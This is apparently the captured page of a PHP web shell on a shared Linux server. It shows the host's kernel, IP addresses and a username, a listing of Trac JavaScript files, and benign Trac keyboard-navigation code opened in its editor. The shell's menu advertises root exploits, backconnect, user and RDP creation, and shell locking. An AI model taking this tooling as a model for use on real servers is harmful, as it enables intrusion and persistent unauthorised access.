Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
trac /
htdocs /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
messages
[ DIR ]
drwxr-xr-x
admin_enums.js
2.96
KB
-rw-r--r--
auto_preview.js
5.35
KB
-rw-r--r--
babel.js
6.76
KB
-rw-r--r--
blame.js
3.45
KB
-rw-r--r--
diff.js
4.52
KB
-rw-r--r--
expand_dir.js
6.16
KB
-rw-r--r--
folding.js
2.68
KB
-rw-r--r--
jquery-ui-addons.js
76.71
KB
-rw-r--r--
jquery-ui.js
535.7
KB
-rw-r--r--
jquery.js
87
KB
-rw-r--r--
keyboard_nav.js
2.78
KB
-rw-r--r--
log_graph.js
1.18
KB
-rw-r--r--
noconflict.js
228
B
-rw-r--r--
query.js
19.75
KB
-rw-r--r--
resizer.js
930
B
-rw-r--r--
search.js
3.21
KB
-rw-r--r--
threaded_comments.js
6
KB
-rw-r--r--
timeline_multirepos.js
1.48
KB
-rw-r--r--
trac.js
8.55
KB
-rw-r--r--
wiki.js
2.58
KB
-rw-r--r--
wikitoolbar.js
3.15
KB
-rw-r--r--
workflow_graph.js
8.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : keyboard_nav.js
(function($){ var SELECTED_FILE_ELEM = null; var LAST_HOVERED_FILE_ELEM = null; var ENABLE_KEY_NAV = true; $(document).keydown(function(event) { if (!ENABLE_KEY_NAV) return true; if (event.ctrlKey) return true; // let CTRL+R do its job var selection = SELECTED_FILE_ELEM; function pickFirst() { selection = $('#f0'); if ( !selection.length ) selection = $("#dirlist tr:first"); } function pickCurrent() { selection = LAST_HOVERED_FILE_ELEM; if ( selection == null ) pickFirst(); } switch (event.which) { case 74: // 'j' - next line if ( selection == null ) pickFirst(); else do { selection = selection.next(); } while (selection.length > 0 && selection.css("display") == 'none'); break; case 75: // 'k' - previous line if ( selection == null ) pickFirst(); else do { selection = selection.prev(); } while (selection.length > 0 && selection.css("display") == 'none'); break; case 13: // <Enter> case 65: // 'A'nnotate case 79: // 'o'pen case 82: // 'r'eload case 86: // 'v'iew if (selection == null) pickCurrent(); var expander = selection.find('.expander'); if (expander.length > 0) { if (event.keyCode == 82) { // 'r'eload expander.removeClass("expanded"); selection.removeClass("collapsed") .siblings("tr."+selection.get(0).id).not(selection).remove(); } expander.click(); } else { var href = selection.find('a.file').attr('href'); if (!href) href = selection.find('a.parent').attr('href'); if (href) { if (event.keyCode == 65) // 'a'nnotate also ok for now href += (href.indexOf("?")>-1?'&':'?') + 'annotate=blame'; window.location = href; } } return false; break; case 76: // 'L'og if (event.shiftKey && selection != null) { var href = selection.find('td.rev a').attr('href'); if (href) window.location = href; } break; default: return true; } if (selection.length > 0) { if (SELECTED_FILE_ELEM != null) SELECTED_FILE_ELEM.removeClass('focus'); selection.addClass('focus'); SELECTED_FILE_ELEM = selection; } return false; }); $(function() { $('a,input,select,textarea,button').on({ focus: function() { ENABLE_KEY_NAV = false; }, blur: function() { ENABLE_KEY_NAV = true; } }); $(document).on("mouseenter", "#dirlist tr", function() { LAST_HOVERED_FILE_ELEM = $(this); }); }); })(jQuery);
Close